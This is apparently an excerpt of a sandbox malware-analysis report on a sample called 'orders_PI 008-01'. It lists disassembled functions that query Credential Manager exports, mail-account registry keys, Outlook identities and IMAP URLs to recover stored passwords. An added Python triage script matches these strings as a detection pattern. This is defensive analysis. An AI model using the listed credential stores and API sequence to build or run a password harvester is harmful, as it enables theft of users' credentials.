                                        • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                        • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                        • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                        • API String ID: 1012775001-1343505058
                                        • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                        • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                        • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                        • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 1439213657-1959339147
                                        • Opcode ID: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                        • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                        • Opcode Fuzzy Hash: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                        • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                        APIs
                                        • memset.MSVCRT ref: 00444612
                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                        • strlen.MSVCRT ref: 0044462E
                                        • memset.MSVCRT ref: 00444668
                                        • memset.MSVCRT ref: 0044467C
                                        • memset.MSVCRT ref: 00444690
                                        • memset.MSVCRT ref: 004446B6
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                        • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                        • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                        • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                        • _mbscpy.MSVCRT(?,?), ref: 00444812
                                        • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset$strlen$_mbscpy
                                        • String ID: salu
                                        • API String ID: 3691931180-4177317985
                                        • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                        • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                        • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                        • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                        APIs
                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                        • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                        • API String ID: 2449869053-232097475
                                        • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                        • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                        • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                        • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                        APIs
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • strlen.MSVCRT ref: 00443AD2
                                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                        • memset.MSVCRT ref: 00443B2E
                                        • memset.MSVCRT ref: 00443B4B
                                        • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                        • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                        • LocalFree.KERNEL32(?), ref: 00443C23
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                          • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                        Strings
                                        • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                        • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                        • Salt, xrefs: 00443BA7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                        • API String ID: 665470638-2687544566
                                        • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                        • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                        • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                        • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                        • memset.MSVCRT ref: 0040F84A
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                        • LocalFree.KERNEL32(?), ref: 0040F92C
                                        • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                        • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                        • API String ID: 551151806-1288872324
                                        • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                        • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                        • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                        • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                        APIs
                                        • sprintf.MSVCRT ref: 0040957B
                                        • LoadMenuA.USER32(?,?), ref: 00409589
                                          • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                          • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                          • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                          • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                        • DestroyMenu.USER32(00000000), ref: 004095A7
                                        • sprintf.MSVCRT ref: 004095EB
                                        • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                        • memset.MSVCRT ref: 0040961C
                                        • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                        • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                        • DestroyWindow.USER32(00000000), ref: 0040965C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                        • String ID: caption$dialog_%d$menu_%d
                                        • API String ID: 3259144588-3822380221
                                        • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                        • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                        • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                        • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                        APIs
                                          • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                        • API String ID: 2449869053-4258758744
                                        • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                        • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                        • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                        • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
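The function listings above (Firefox logins.json / signons.sqlite handling, the Windows Live Mail and Windows Mail registry paths, psapi.dll and advapi32.dll Cred* exports resolved through GetProcAddress, and the /scomma, /shtml, /sverhtml, /sxml, /stab, /stabular, /skeepass output switches) are the string-level fingerprint behind the report's "WebBrowserPassView password recovery tool" signature. The following triage script is an added example, not Joe Sandbox or NirSoft code: it scans a raw memory dump for exactly those literals, groups hits by harvesting capability and only flags the dump when several capabilities co-occur. The category names, the co-occurrence threshold and the constructed sample dump are the author's own; the script assumes the literals appear as NUL-terminated ASCII strings, as they do in the listed dump.

```python
"""Group the credential-harvesting indicator strings from the report's function
listings by capability and flag a dump when several capabilities co-occur.

Added triage example; not part of the Joe Sandbox report or any NirSoft tool.
"""
import re
from collections import defaultdict

# Literals copied from the "String ID" entries of the listings above.
# Category names and grouping are the author's choice, not the report's.
# "Salt" is deliberately omitted: on its own it is far too generic to match on.
INDICATORS = {
    "browser_store": [b"logins.json", b"signons.sqlite", b"signons.txt",
                      b"nss3.dll", b"sqlite3.dll"],
    "mail_registry": [b"Software\\Microsoft\\Windows Live Mail",
                      b"Software\\Microsoft\\Windows Mail"],
    "credman_exports": [b"CredReadA", b"CredEnumerateA", b"CredEnumerateW",
                        b"CredDeleteA", b"CredFree"],
    "psapi_exports": [b"EnumProcesses", b"EnumProcessModules",
                      b"GetModuleFileNameExA", b"GetModuleBaseNameA",
                      b"GetModuleInformation"],
    "nirsoft_switches": [b"/scomma", b"/shtml", b"/sverhtml", b"/sxml",
                         b"/stab", b"/stabular", b"/skeepass"],
}


def scan_dump(data: bytes) -> dict:
    """Return {category: [(indicator, offset), ...]} for every literal found.

    Each literal is matched together with its terminating NUL so that a short
    switch such as "/stab" does not also fire inside "/stabular".
    """
    hits = defaultdict(list)
    for category, needles in INDICATORS.items():
        for needle in needles:
            pattern = re.escape(needle) + rb"\x00"
            for match in re.finditer(pattern, data):
                hits[category].append((needle.decode("ascii"), match.start()))
    return dict(hits)


def classify(hits: dict, min_categories: int = 3):
    """Verdict plus the sorted list of capabilities seen.

    A single capability (for example only the Cred* exports) is common in
    benign software; the dump is flagged only when at least `min_categories`
    distinct capabilities are present. The threshold is an assumption.
    """
    present = sorted(category for category, found in hits.items() if found)
    verdict = "password-recovery-tool" if len(present) >= min_categories else "inconclusive"
    return verdict, present


def build_sample_dump() -> bytes:
    """Constructed stand-in for a memory dump (not the report's .sdmp file):
    a few of the listed literals, each NUL-terminated as a C string literal
    would be, separated by filler bytes."""
    literals = [b"logins.json", b"signons.sqlite",
                b"Software\\Microsoft\\Windows Live Mail",
                b"CredEnumerateA", b"CredReadA",
                b"/shtml", b"/stabular", b"EnumProcesses"]
    dump = bytearray(b"\x90" * 64)
    for literal in literals:
        dump += literal + b"\x00" + b"\xcc" * 7
    return bytes(dump)


if __name__ == "__main__":
    found = scan_dump(build_sample_dump())
    verdict, categories = classify(found)
    for category, entries in found.items():
        for indicator, offset in entries:
            print(f"{category:17s} {offset:#010x} {indicator}")
    print(verdict, categories)
```

Point `scan_dump` at the bytes of a real process dump (for instance the 0x400000 region the listings are taken from) to reproduce the check; the offsets it reports can be cross-referenced against the `xrefs` addresses in the listings to confirm that the strings sit in the unpacked module rather than in unrelated heap data.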
                                        APIs
                                        • wcsstr.MSVCRT ref: 0040426A
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                        • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                        • strchr.MSVCRT ref: 004042F6
                                        • strlen.MSVCRT ref: 0040430A
                                        • sprintf.MSVCRT ref: 0040432B
                                        • strchr.MSVCRT ref: 0040433C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                        • String ID: %s@gmail.com$www.google.com
                                        • API String ID: 3866421160-4070641962
                                        • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                        • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                        • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                        • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                        APIs
                                        • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                          • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                          • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                          • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                        • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                        • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                        • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                        • memset.MSVCRT ref: 004097BD
                                        • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                        • API String ID: 1035899707-3647959541
                                        • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                        • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                        • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                        • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                        APIs
                                        • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy
                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                        • API String ID: 714388716-318151290
                                        • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                        • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                        • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                        • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                        APIs
                                        • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                        • SelectObject.GDI32(?,?), ref: 0040CACC
                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                        • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                          • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                          • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                          • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                        • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                        • SetCursor.USER32(00000000), ref: 0040CB35
                                        • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                        • SetFocus.USER32(?), ref: 0040CB92
                                        • SetFocus.USER32(?), ref: 0040CC0B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                        • String ID:
                                        • API String ID: 1416211542-0
                                        • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                        • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                        • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                        • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                        • API String ID: 2360744853-2229823034
                                        • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                        • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                        • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                        • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                        APIs
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        • memset.MSVCRT ref: 00402C9D
                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                        • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • memset.MSVCRT ref: 00402CF7
                                        • sprintf.MSVCRT ref: 00402D10
                                        • sprintf.MSVCRT ref: 00402D4E
                                          • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                          • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Closememset$sprintf$EnumOpen
                                        • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                        • API String ID: 1831126014-3814494228
                                        • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                        • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                        • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                        • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                        APIs
                                        • strchr.MSVCRT ref: 004100E4
                                        • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
